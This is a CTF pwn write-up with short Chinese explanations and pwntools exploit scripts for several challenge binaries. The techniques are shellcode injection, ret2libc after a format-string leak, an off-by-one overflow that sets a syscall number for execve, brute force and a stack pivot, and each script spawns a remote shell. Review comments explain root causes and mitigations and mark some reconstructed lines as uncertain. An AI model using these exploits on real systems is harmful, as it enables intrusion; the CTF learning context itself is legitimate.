ez_shellcode
简单的shellcode
from pwn import*
# Target architecture and the remote CTF service (host/port as given in the writeup).
context.arch='amd64'
io=remote('nc1.ctfplus.cn',39373)
# Fixed address that the overwritten return address will jump to; presumably where the
# first input (the shellcode sent below) ends up — confirm against the binary. A fixed,
# executable buffer is the root cause: NX and PIE/ASLR would each break this.
shellcode_addr=0x0401256
shellcode=asm(shellcraft.sh())
io.send(shellcode)
# Second input overflows the stack buffer (0x18 bytes, +8 presumably for the saved rbp)
# and replaces the return address. A stack canary would abort before the return.
payload=cyclic(0x18+8)+p64(shellcode_addr)
io.sendline(payload)
io.interactive()
|
你会栈溢出吗?
简单的64位栈溢出,注意堆栈平衡
from pwn import*
io=remote('nc1.ctfplus.cn',23262)
# Address named `ret` in the writeup; it is placed before the real target 0x400728.
# The prose says to "mind stack balance", so this is presumably a ret gadget used to keep
# the stack 16-byte aligned — verify in the binary.
ret=0x040057e
# Overflow past a 0xC-byte buffer plus 8 bytes (saved rbp, presumably) into the return
# address; a stack canary would detect this overwrite.
payload=cyclic(0xC+8)+p64(ret)+p64(0x400728)
io.sendline(payload)
io.interactive()
|
买黑吗喽了么

一道菜单题,输入1进入购买,输入2查看余额,输入3写反馈。


不断进行购买至负数,然后余额就会变成非常大的正数,就能输入%p泄漏基址,接着进入反馈函数打ret2libc
from pwn import*
context.arch='amd64'
elf=ELF('./syscall')
libc=ELF('./syscalllibc.so.6')
io=remote('nc1.ctfplus.cn',35338)
# Menu per the writeup: 1 = buy, 2 = check balance, 3 = feedback.
# Repeated purchases push the balance negative until it is shown as a huge positive
# value — an integer sign/wrap bug; checking the balance before subtracting closes it.
# NOTE(review): the original line breaks were lost, so whether both sends below belong
# to the loop body is reconstructed, not certain.
for _ in range(9):
    io.sendlineafter(b"choice:",b"1")
    io.sendlineafter(b"choice:",b"1")
io.sendlineafter(b"choice:",b"1")
io.sendlineafter(b"choice:",b"2")
io.sendlineafter(b"choice:",b"2")
# The balance path passes user text to a format function: "%p" prints a pointer
# (format-string leak; printf("%s", buf) / -Wformat-security prevent it).
io.send(b"%p")
io.recvuntil(b"0x0x")
# Leaked pointer minus a fixed offset gives the PIE load base; 0x4090 is presumably the
# offset of the leaked object inside the binary — confirm.
base=int(io.recv(12),16)-0x4090
print(hex(base))
# Gadgets and PLT/GOT entries rebased onto the leaked base.
rdi=base+0x11f1
ret=base+0x101a
puts_plt=base+elf.plt['puts']
puts_got=base+elf.got['puts']
# Feedback input overflows after 0x50+8 bytes. First chain calls puts(puts@GOT) to leak
# a libc address, then returns to base+0x14BC (presumably the feedback function again).
io.sendlineafter(b"choice:",b"3")
payload=cyclic(0x50+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(base+0x14BC)
io.sendlineafter(b"feedback:",payload)
# Take the 6-byte little-endian address ending in 0x7f and zero-extend it to 8 bytes.
puts=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts))
libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search('/bin/sh\x00'))
# Second chain: the extra ret presumably keeps rsp 16-byte aligned for system().
payload=cyclic(0x50+8)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system)+p64(0)
io.sendline(payload)
io.interactive()
|
简单的签到
简单的计算,接收两个数并进行计算即可。
from pwn import*
io=remote('nc1.ctfplus.cn',31333)
# Send a newline once the banner ending in "challenge." has arrived.
io.sendafter(b"challenge.",b"\n")
# Prompt has the form "<a>*<b>="; parse both operands (int() accepts ASCII-digit bytes).
v2=int(io.recvuntil("*",drop=True))
v3=int(io.recvuntil("=",drop=True))
v4=v2*v3
# Reply with the product; pwntools encodes the str for us.
io.sendline(str(v4))
io.interactive()
|
00000

输入的密码与程序随机生成的密码一致则获得flag,写脚本爆破即可。
from pwn import *
# Not used anywhere in this script (presumably left over from a local-debugging template).
filename = './00000'
context(arch = 'amd64', log_level = 'debug', os = 'linux')
# Brute force per the writeup: the program compares the input with a randomly generated
# password, so each attempt opens a fresh connection and tries once. The weakness is the
# tiny keyspace (256 tries suggests one byte of entropy — assumption, confirm); a proper
# CSPRNG-backed secret with enough bits, or rate limiting, makes this infeasible.
for i in range(256):
    io = remote('nc1.ctfplus.cn',26368)
    try:
        io.sendline(b'\x00')
        # NOTE(review): pwntools recvuntil with a timeout returns b'' instead of raising
        # when '{' never arrives, so interactive() is likely entered on every try — verify.
        io.recvuntil('{', timeout = 0.3)
        io.interactive()
    # NOTE(review): a bare except also swallows KeyboardInterrupt and SystemExit.
    except:
        continue
    finally:
        io.close()
|
over_flow??


存在一个函数,输入的filename会溢出一个字节,可以修改open_fd

存在系统调用,修改open_fd的值为想要调用的系统调用号,比如修改为0x3b,进行execve('/bin/sh',0,0),而filename作为第一个参数,因此可以输入/bin/sh
from pwn import*
io=remote('nc1.ctfplus.cn',26196)
# Select the menu option that reads a filename.
io.sendline(b'2')
# Per the writeup: the filename buffer overflows by one byte into open_fd, and that value
# is used as a syscall number — 0x3b (execve) with the filename as first argument.
# A classic off-by-one past the buffer bound; a length check on the read prevents it.
payload=b'/bin/sh\x00'+b'\x3b'
io.sendline(payload)
io.interactive()
|
这里的空间有点小啊
打栈迁移。
from pwn import*
context.arch='amd64'
elf=ELF('./zhanqianyi')
libc=ELF('./zhanqianyilibc.so.6')
io=remote('nc1.ctfplus.cn',34571)
# Stack pivot ("栈迁移") onto a writable fixed address in .bss because the overflow room
# is small. Addresses are absolute, so the binary presumably has no PIE — confirm.
bss=0x0601530
read=0x040071C
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
leave=0x0400738
rdi=0x0400853
ret=0x0400566
io.sendlineafter(b">>\n",b'1')
# Only 0x30 bytes of buffer: overwrite the saved rbp with bss and return into read so the
# next input is written relative to the new frame. A stack canary would stop this here.
payload=b'a'*(0x30)+p64(bss)+p64(read)
io.sendafter('something\n',payload)
# Fake frame: leak puts@GOT, call read again, carry '/bin/sh', then leave pivots rsp via
# the saved rbp bss-0x30. The bin_sh offset below implies this payload lands at bss-0x30
# (assumption — depends on read's frame layout; confirm).
payload=p64(bss+0x100)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(read)+b'/bin/sh\x00'+p64(bss-0x30)+p64(leave)
io.send(payload)
puts=u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts))
libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']
# '/bin/sh' starts after five 8-byte words (0x28) of the previous payload.
bin_sh=bss-0x30+0x28
# Final frame: ret for 16-byte alignment, then system('/bin/sh'); leave pivots once more.
payload=p64(bss+0x50)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system)+p64(0)+p64(bss+0x100-0x30)+p64(leave)
io.sendline(payload)
io.interactive()
|
Black_Myth_Wukong